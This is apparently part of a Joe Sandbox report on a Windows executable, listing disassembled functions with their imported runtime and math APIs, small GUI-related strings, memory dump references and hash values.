Instruction ID: 9d950dc7719193a1c8fd3c9cdb10fcb9b30eed56eef2c3e9c806fd669b8f9f35
Opcode Fuzzy Hash: f3fdd610339c870ffcb6d935aff851ddff91c481497ef150e6b16470cbd16cda
Instruction Fuzzy Hash: 25920A33A14BC6ABE715DB36C5802E9F3A0FF59754F488735DB18676A1DB38B0A09B10

Function 00007FF735DB8BA0 Relevance: 7.8, APIs: 6, Instructions: 280COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB8C25
memset.VCRUNTIME140 ref: 00007FF735DB8D1F
memset.VCRUNTIME140 ref: 00007FF735DB8D38

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memset$malloc
String ID:
API String ID: 1671641884-0
Opcode ID: ac004c46bf0219cfccfdba9d71a28d15240b7af4034fff980dd1efa853c164b3
Instruction ID: f00c6503e9b02c2e4ecff476d63c8e777cb3232a1f229da28379559bc0c2619e
Opcode Fuzzy Hash: ac004c46bf0219cfccfdba9d71a28d15240b7af4034fff980dd1efa853c164b3
Instruction Fuzzy Hash: 56D1E632919BC6A6E765DF26D0802B9F3A1FF58B84F488231DB4823360EF39E551DB10

Function 00007FF735DCF040 Relevance: 6.5, APIs: 4, Instructions: 451COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCF1FF
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCF232
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCF5DE
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCF64E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 240b74ad42adf89183d43564f1c5106c68109b7536c76a6bf629c0e81fca2642
Instruction ID: 94d50a99ea2770484240fddc128459ab21093ab5419b5c2da2a4ef117e4f27f4
Opcode Fuzzy Hash: 240b74ad42adf89183d43564f1c5106c68109b7536c76a6bf629c0e81fca2642
Instruction Fuzzy Hash: 8B126E23D2DB8F51E613A63750812F9E2506F6EBC0F58CB32ED8D3A6A5DF287181A550

Function 00007FF735DC3A70 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF735DC3BF3
memchr.VCRUNTIME140 ref: 00007FF735DC3CC1
memchr.VCRUNTIME140 ref: 00007FF735DC3D9E

Strings

..., xrefs: 00007FF735DC3A73

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memchr
String ID: ...
API String ID: 3297308162-440645147
Opcode ID: e9c7574d3c730807649c51f8e2cb472bd98aacfbb7cf540c450d26418fa25f29
Instruction ID: 06557ac8b601c0200db5bd724f6e902d9927ed97d3f891ebda1c14bed16e2bab
Opcode Fuzzy Hash: e9c7574d3c730807649c51f8e2cb472bd98aacfbb7cf540c450d26418fa25f29
Instruction Fuzzy Hash: AFF15E33D18BCA91E212973691813F9F350EF6EBC4F588732EA88365A1DF79A5C19740

Function 00007FF735DCEA70 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCEBEA
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCEC0B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCEF35
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCEF9D

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 749167c5e655d41d55095cb4974c7058cc6ce89b9ab866a665848e8e023d0edf
Instruction ID: ae13e0cbefec0cb90062c3ffbaeac44cc16f91cb1ef1557f16767cb86db12517
Opcode Fuzzy Hash: 749167c5e655d41d55095cb4974c7058cc6ce89b9ab866a665848e8e023d0edf
Instruction Fuzzy Hash: 77E16D22D187CE55E213AB3755811B5E351EF6EFC4F5C8B32ED88362A1DF387181A660

Function 00007FF735DCE4B0 Relevance: 6.3, APIs: 4, Instructions: 335COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE61F
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE633
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE991
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE9DA

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 59f8129df68933931f5c6d552301edb6c0ca9d80d97bf828ad6066f13b71d3bb
Instruction ID: e33c7e6fb989ac9e3a5b372cf8e74c08931f4bdab0583b193c9abfead6c9cd23
Opcode Fuzzy Hash: 59f8129df68933931f5c6d552301edb6c0ca9d80d97bf828ad6066f13b71d3bb
Instruction Fuzzy Hash: 65E14B22D286CE95E663E73750811B9F350EF6EB84F5C9B32ED88761A1DF3871809650

Function 00007FF735DEB78C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF735DEB7B8
GetCurrentThreadId.KERNEL32 ref: 00007FF735DEB7C6
GetCurrentProcessId.KERNEL32 ref: 00007FF735DEB7D2
QueryPerformanceCounter.KERNEL32 ref: 00007FF735DEB7E2

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 2a9044cefc9845f669aa88065a95f2b4573dcafd3f21c0fcbee61d9b121317c0
Instruction ID: b67bb2b9caaeb1b307b413f572da76ecbd53d4a923854384da20c8c49203f8c9
Opcode Fuzzy Hash: 2a9044cefc9845f669aa88065a95f2b4573dcafd3f21c0fcbee61d9b121317c0
Instruction Fuzzy Hash: 3D115A22B14F129AFB00EF70E8952B873A4FB18B58F840E31DA2D867A4DF7CD1948350

Function 00007FF735DEB910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF735DD1965), ref: 00007FF735DEB936
FormatMessageA.KERNEL32 ref: 00007FF735DEB969

Strings

!x-sys-default-locale, xrefs: 00007FF735DEB929

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 72384d2fa61083b35fdda294e9dbef127bd343459967c3db0ddb212c398ecd12
Instruction ID: 10f9179e748a022fec059f3c1dd2e4133283f2870c3de9b9e3a80322ad9e2ef4
Opcode Fuzzy Hash: 72384d2fa61083b35fdda294e9dbef127bd343459967c3db0ddb212c398ecd12
Instruction Fuzzy Hash: 51018472B1878392F7599B12F88077AA7A1F784BD4F844035DA8D46A98CF3CE5449710

Function 00007FF735DC7680 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

Strings

%*s%.*s, xrefs: 00007FF735DC7F13
%.*s, xrefs: 00007FF735DC7EEE

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: %*s%.*s$ %.*s
API String ID: 0-3400057116
Opcode ID: 15565355a38e31a9c43d3948f3f46918d3c0f15999e1d1242ac34b08c1786a07
Instruction ID: 08fd1a90b8354b41ae7ca19cec3366cebcddf3efd7c344065d25ff112b16018d
Opcode Fuzzy Hash: 15565355a38e31a9c43d3948f3f46918d3c0f15999e1d1242ac34b08c1786a07
Instruction Fuzzy Hash: 1A224572E18687A5E711EB3694801FEF360FF59B58F848335DE98176A4EF38A044EB50

Function 00007FF735DBA800 Relevance: 4.2, APIs: 3, Instructions: 418COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DB81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB834C
Part of subcall function 00007FF735DB81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB8379
Part of subcall function 00007FF735DB81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB83A0
Part of subcall function 00007FF735DB81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB83C3

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBACC7

Part of subcall function 00007FF735DB9C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9CFA

Part of subcall function 00007FF735DB9250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9352

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBAC8B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBACA6

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free$ceilffloorfmalloc
String ID:
API String ID: 573317343-0
Opcode ID: b272a0d186d7ca9dc89a1e5bc61e875377835f1e2c59331d1577e9d413d7d3b2
Instruction ID: 1503f0435e8a8cb9cf5c2857b321f908c65326605e51d357b21a9f787c88deb7
Opcode Fuzzy Hash: b272a0d186d7ca9dc89a1e5bc61e875377835f1e2c59331d1577e9d413d7d3b2
Instruction Fuzzy Hash: 9712DF32A18B959AE311CB35D0806BDB7B5FF5D784F058336EE88A3654EB38E491DB10

Function 00007FF735DD0D80 Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD0E68

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: afd8212adba07f9817480506c6e31eebf85320f67040c25655b48eb84f541a2b
Instruction ID: 96e659d0050bdd2817b9c2b4319cf7b70258782b4912d707bd0c333855493fc9
Opcode Fuzzy Hash: afd8212adba07f9817480506c6e31eebf85320f67040c25655b48eb84f541a2b
Instruction Fuzzy Hash: 52415E02E38B8E56E817A23650429B9C5D16FEABC4D9CC732E94F31791FB3C71D2A510

Function 00007FF735DC5220 Relevance: 2.9, Strings: 2, Instructions: 416COMMON

Download Yara Rule

Strings

#SCROLLY, xrefs: 00007FF735DC5263
#SCROLLX, xrefs: 00007FF735DC5259

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: #SCROLLX$#SCROLLY
API String ID: 0-350977493
Opcode ID: a2a48a90be6ed4dde7050a14f79263956d374721b7953dcf6fce21e3f0767ab4
Instruction ID: 62726232802a965e58b74947a07fc4b4ea92419aa113ed18afa8fdc61fa61e67
Opcode Fuzzy Hash: a2a48a90be6ed4dde7050a14f79263956d374721b7953dcf6fce21e3f0767ab4
Instruction Fuzzy Hash: B7120B22D28BCD95E213DA3790821B9F350EF7E784F68D723FD85365A2DB24B0D19A50

Function 00007FF735DC0BA0 Relevance: 2.8, Strings: 2, Instructions: 314COMMON

Download Yara Rule

Strings

..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF735DC0BFC
- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF735DC0BDD

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
API String ID: 0-4293514333
Opcode ID: 4e449b9e0027eaf29c9138731245b7fee6dff2865554fa47f10f3ebceb760723
Instruction ID: 630605c520e8631e3376dfd35fe64a429788c6a1de13df86fa3a77d6e8b00a9a
Opcode Fuzzy Hash: 4e449b9e0027eaf29c9138731245b7fee6dff2865554fa47f10f3ebceb760723
Instruction Fuzzy Hash: DFD13C23B046D489D754CF29C8D5A7CBB9AE784B06B4BC176CE89C23A1EB7AC445D310

Function 00007FF735DC5990 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

[ ], xrefs: 00007FF735DC5E33
[x], xrefs: 00007FF735DC5E2C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: [ ]$[x]
API String ID: 0-3323218928
Opcode ID: 047ad51d741861d190e8ea0d9068e887e4ef788c990cf3d7a3cd7a41e4bf6df0
Instruction ID: baf06414dae53d37500656aaafccbd816cab323dc4aadf7edb035cc6f7d08a83
Opcode Fuzzy Hash: 047ad51d741861d190e8ea0d9068e887e4ef788c990cf3d7a3cd7a41e4bf6df0
Instruction Fuzzy Hash: 0DE1E932D18B8A95E302DB3694411F9F350EFAE784F489731FE98265A6DB39A181DB10

Function 00007FF735DDA7E0 Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FF735DDA84C
VUUU, xrefs: 00007FF735DDA832

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: VUUU$VUUU
API String ID: 0-3149182767
Opcode ID: f001a9871843b87fbdc46dc225f36371c81ced18e5a73bc4658ba29048f7e097
Instruction ID: dc542d4ef29d4333200b2e508d3c9422feff429920347e7c020d2d8625bba262
Opcode Fuzzy Hash: f001a9871843b87fbdc46dc225f36371c81ced18e5a73bc4658ba29048f7e097
Instruction Fuzzy Hash: F3C1B733E10B4899E301DB3A94415E9B361FF6AB887559332FE0C77665DF34A191EB80

Function 00007FF735DB9250 Relevance: 2.7, APIs: 2, Instructions: 214COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9352
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9592

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: c91da888b2ee01a3ef7a8ad55d8c86c552af1dc53de2f38c0342df298a2de18c
Instruction ID: a78b5c974ad973b8c8ac4d42a4250f716e69fe391797de96992deb1accbb9354
Opcode Fuzzy Hash: c91da888b2ee01a3ef7a8ad55d8c86c552af1dc53de2f38c0342df298a2de18c
Instruction Fuzzy Hash: C3914932A296C6A6DB11DB3AD0407B9B3A1FF99B85F94C331DE0A62755EF38E041D710

Function 00007FF735DC65D0 Relevance: 1.8, Strings: 1, Instructions: 508COMMON

Download Yara Rule

Strings

##Combo_%02d, xrefs: 00007FF735DC6CD2

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: ##Combo_%02d
API String ID: 0-4250768120
Opcode ID: 3126a90e08de63a8d59328f23d4be192762ecf234c4a37fdf578bc694a7f13c9
Instruction ID: af3f82d7e42c8d73e3eed5eb948e6df7a6d93518ec987f66ca30b4a8d5c7dda9
Opcode Fuzzy Hash: 3126a90e08de63a8d59328f23d4be192762ecf234c4a37fdf578bc694a7f13c9
Instruction Fuzzy Hash: DD42E833918B8696E711DB3AD0801E9F760FF99B84F549331EA88276A5DF38E095DB40

Function 00007FF735DC2E50 Relevance: 1.7, APIs: 1, Instructions: 488COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF735DC3141

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
